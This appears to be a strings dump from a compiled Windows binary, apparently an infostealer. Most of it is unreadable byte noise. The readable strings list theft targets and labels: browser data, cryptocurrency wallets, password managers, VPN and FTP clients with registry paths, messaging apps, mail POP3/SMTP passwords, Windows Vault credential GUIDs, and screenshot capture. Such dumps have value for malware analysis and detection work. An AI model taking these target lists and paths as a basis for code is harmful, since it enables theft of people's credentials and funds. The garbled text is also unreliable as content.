D!DMDQO
O!OMOQT
T!TMTQU
U!U"UMUQY!Y&Y*YMYQZ!Z.Z2ZMZQ_!_6_:_M_QkMn!n>nBnMnQpMz!zFzJzMzQ{
{!{M{Q|
|!|M|Q~
~!~M~Q
* ="@$B&D(O*S,T.U0V2X5Y9Z;[=_@dBfDgKiLkPnSuUvnxpyqzr{t|v}x~
"!#!$!&%('*).-=<?>@>BADCLKONTSUSWVYXZX\[^]_]lkmknkqprpvuwvxuyuzu{u|u~}
gtEeQ_
ftY6F6
/:a7+}5
)c>;(|-
z0zjd7
#?>2K6&!<+=4
!(276#"40) 50
,;0X<?*
q3Kze_
&!699>
LS8'"R
kXqyei
:x9i?g
d%z%k*x
-x"?w!
81)74"#6>0
gVE1Wn
W9($cq"I$c
963s*M
/+#p>/$
'B4sU6Sr94=
8<WvV+2
f3LbHn
wp##)`e
wp?6Ur
&"+`e &"+`e
dQFSip
qef9T0
-m"[5)/
j7eksf
TbHTw^DsXT
<`.p8a
`<r,d=GK
#c*G.{-v?b,r3RKC
g5,w19B
?;H%\\v
5{9Y6{1z=d
k%Ie $
iMdRXv
T4nM?(
YT%l>3:p(
jU6WQa
[$#pd-;
f9tW39
nVKUto
$-:26)6
5- "$.6
System
Credman.txt
[Credman] {0}
Networks.txt
[Networks] {0}
Screenshot.png
[Screenshot] {0}
[Steam] {0}
[Twitch] {0}
[OBS] {0}
FileZilla
Servers.txt
[FileZilla] {0}
WinSCP
[WinSCP] {0}
CoreFTP
[CoreFTP] {0}
Snowflake
[Snowflake] {0}
NordVPN
Account.txt
[NordVPN] {0}
EarthVPN
[EarthVPN] {0}
WindscribeVPN
[WindscribeVPN] {0}
AzireVPN
[AzireVPN] {0}
Browsers
key.dat
Wallets
{0}_{1}_{2}
[Chrome Extensions] {0}
[Telegram] {0}
Messengers
Discord
[Discord] {0}
Pidgin
Accounts.txt
[Pidgin] {0}
Outlook
[OulLook] {0}
FoxMail
[FoxMail] {0}
[Viber] {0}
[WhatsApp] {0}
[Signal] {0}
[RamBox] {0}
[Binance] {0}
[MoneroCore] {0}
[BitcoinCore] {0}
[DashcoinCore] {0}
[DogecoinCore] {0}
[LitecoinCore] {0}
[Electrum] {0}
[Exodus] {0}
[Atomic] {0}
[TonWallet] {0}
[Jaxx] {0}
[Coinomi] {0}
[Daedalus] {0}
[Zcash] {0}
[Guarda] {0}
[Wasabi] {0}
[BitWarden] {0}
[KeePass] {0}
[NordPass] {0}
[1Password] {0}
[RoboForm] {0}
[Grabber] {0} - {0}
[{0}] Thread finished!
lLp6dS
=$4<3
?4,aa/;=
mxk96Y
*=?!/#T#9'
omhPsa
4*3.)057
xYxRTx
Mf#b(s9d
aXfxt4
xq8>hg$
}u={xb%{x}1
jLsoFd
Accounts
Account.rec0
Account
POP3Account
Password
POP3Password
sfALNe
UU`WUcR
69&>ReYU
kkRx2Gbb
~BF99SzMAj
tQQ6Mt
Q2~]SM~PR
? #<L-(
u<}Evnq
opDto}E)0"Hxmx
#nwKv:
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Nothing
a#!}y6>
c0'}k5?
Network
-;e5u/Vm+|2 |1f"
vjCxhX
dFEpu5
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
Unable to open the following vault:
. Error: 0x
[ERROR] Unable to enumerate vault items from the following vault:
. Error 0x
SchemaId
pResourceElement
pIdentityElement
LastModified
pPackageSid
Error occured while retrieving vault item. Error: 0x
pAuthenticatorElement
snowflake-ssh
session-store.json
folder
{0}:{1}
password
folders
S4Ig#)*
*})8(o0
qgKmYt
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
recentservers.xml
sitemanager.xml
Server
encoding="base64"
boxS8q
pE0ARS
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
&?<69;
X'/>;6?1
1:$(()6
-c=%1b@G
fwO_IX
bjBcOF
"0;2;:
fudufv
lMRcVm
rXII0G
yFRsI5
1: ,42
eoYayp
**-48"
vKOitd
nphFjG
5%&6;/?S,7%/+$.!(XC
$&:-$G8(<
zMEeP0
(9x<$t
om2dme
1d71l/v&
pjZx5A
G'#&-!#
6'#&-!#
kzWR6I
$b6z=u
&>'0 >
wNzYh0
06.>7+
ahoB4M
##{x244
vpQMp3
>))o1=&$,
hjoCgz
otMUC1
uuENoG
Q+/<<5
a0hYeC
gQe3FL
lkn76q
&z"g0e
h1eq_P
r1QNpg
/ #/,(
.EI`5c?y.}
n(}+w1f5^&Y
=*<$*7&
>$9+($/
jTmvPd
9*$~m01?)
aolP5y
/4+4,/
Windscribe
Software\Windscribe
userId
authHash
Software\EarthVPN
SavePass
Username
8= % 5
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
z718pX
4~-z+d7E
pVhAzz
n0eTVb
;&"0=?
hpYmcy
jyfFdR
3><//5%
?4="398
sz'\o+Y
l1GUfM
+z<qCa8w
9;9[35#>1== ;
y8kh5z
nMwWi_
89*$=*88*
ru5Mh9
pP9sBv
'))*3*)1"$&?49
gCGLIu
$#* 0 *
pp57GC
l7KNL0
iSKYM3
F)$#}3+I!c;99.f1(%Wx 2*$}
;f%&:>X)
aBRV6s
K|(kNg[
Me*kK|
ipU2FE
R}!%r ;]
(/'=4'A
accounts.xml
Pidgin / {0}
9&29r6.
-1?,("-0?
6&=sV>#
nxEEy6
oXvuM7
bZvsoj
lxcYwN
l?:& #
dNpyrV
gPyDLe
3+&u/*&
=5"b9$
fECpM9
%e2(g'
sSvxR3
:e&/s<(w
7!8:;9
3=)8>=
Profiles
key?.db
gCHE_7
j1lnbS
fuSGcY
pSom3E
&d)-q2&S
0g q,S
sBHokn
dNlj8d
5=:4:<
>&q9<i,
$[LQ Z3%3!%
hsVtp_
31,"(+#
;<?/?9
(e F| 5]
i5XGym
$7#)64*&.
$/! 5/
enwDfw
23;..9
iZsQeh
hSh23G
$t!2|+
ihWIfU
?#/y#$>
tumyZI
*User Data*
Local State
profile
info_cache
Default
6/,w5-!
u0bzXA
ceLy5h
sLbOtW
jIbxr2
5au2|"6~z#h
D}f,T
ug61t0
;?! ,-1;
d9.C+*\
#&6-2!$
5=3"<*:<<==(4$>*=<<(3(>$>!2*:.1/
)$)#d&-$,z#)/'d).7){ ,7!q *(>
-:(6;=1?&,1=-:# :%,9(4;978$(9>-:
h3oBhc
s$ |&
5|&d1%6{+q,#;z3y1=#q(p3(!y(}($9r
r4a5an
?>"2;2
S!!:,> ,
M%:/?$
ek8YdG
uegGOl
}(<T:7`(&~
q1lw2r
p0UYa0
%'*$8,>%/%>611*??(02(1&!=173?(>?
wq5KpZ
965,8,#
)t2!=t'$%
;'=k&! q1=+
;!:p29"u8/
qfbeGn
/6>(-90"789!1'?!+'8!.?<,+6%!,9$*
ovLHq9
;8/)?8
->r 39|
> -00P/,+9
dBT6RF
4=! ?%9
# % !
ivZzCr
/{=-p>#q:.u8'p7"u;&{</y5)f=$q5-r
0f6=:2z2<&+a1#=6}0<>3e5?<(z0##>x
gB4DeF
sFTENg
>1z3-
e 0#aT
khGK_N
xNfkZO
kwICu2
yRvk8e
encWHa
Local Extension Settings
!51 3O>
797z=)G
!;7 #(&z3.<z </
C99=5?&706' &@1440=08"'U#3<%!#40
~6<ad.}Z-r $w6(
k5Fu9x
K<)3<9>00#+,]:/&"-0
actcRu
T>/ 0):$3-J 5(J16#>T1-/"">
Fc""c8Pg*'g>&L
N*>v-)?
&)$v07$~B1-k4
UY/8$c6%
0*?8A0_^@\0V!(+5T1$=:TT"!=*$?&5';8
;!9(T1%'7 5T(=:0
'E0U2E;
gIC4Re
8 Kv]k&
^]UUuCJWH
^WEN#1>75<3#:6'
kHTHS0
'6)^83
2+<dE&G[#}Lg
l74Fto
o6TnNB
l#g?g
>,6;'#
rsPFRf
:c[8 "q
3q%4 .q
ja7UB2
>:%3!"9
Q.> "#
=/4>=.9
H%4#=:
sQ64Rx
szGUmv